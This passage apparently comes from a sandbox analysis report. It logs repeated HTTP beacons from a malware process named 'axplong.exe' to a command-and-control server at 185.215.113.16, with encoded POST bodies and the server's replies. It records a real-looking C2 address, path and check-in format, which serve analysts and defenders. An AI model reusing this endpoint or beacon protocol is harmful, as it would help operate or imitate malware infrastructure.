                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:24.504070044 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:24 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        19192.168.2.652339185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:24.612999916 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:25.323458910 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:25 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:25.324562073 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:25.556170940 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:25 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        20192.168.2.652340185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:25.675662994 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:26.370754004 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:26 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:26.371593952 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:26.597754002 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:26 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        21192.168.2.652341185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:26.707528114 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:27.595855951 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:27 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:27.597522974 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:27.964509010 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:27 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        22192.168.2.652343185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:28.098059893 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:28.869976997 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:28 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:28.873342991 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:29.109827995 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:28 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        23192.168.2.652344185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:29.222044945 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:29.941618919 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:29 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:29.944001913 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:30.217442036 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:30 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        24192.168.2.652345185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:30.332622051 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:31.184906006 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:31 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:31.185894012 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:31.422466993 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:31 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        25192.168.2.652346185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:31.542525053 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:32.235276937 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:32 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:32.236218929 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:32.463326931 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:32 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        26192.168.2.652347185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:32.581437111 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:33.301938057 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:33 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:33.343888998 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:33.573101044 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:33 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        27192.168.2.652348185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:33.693254948 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:34.422604084 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:34 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:34.423326015 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:34.659630060 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:34 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        28192.168.2.652349185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:34.768619061 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:35.486648083 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:35 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:35.487473965 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:35.716969967 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:35 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        29192.168.2.652350185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:35.836194992 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:36.668822050 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:36 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:36.669954062 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:36.904921055 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:36 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        30192.168.2.652351185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:37.022066116 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:37.758265018 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:37 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:37.761336088 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
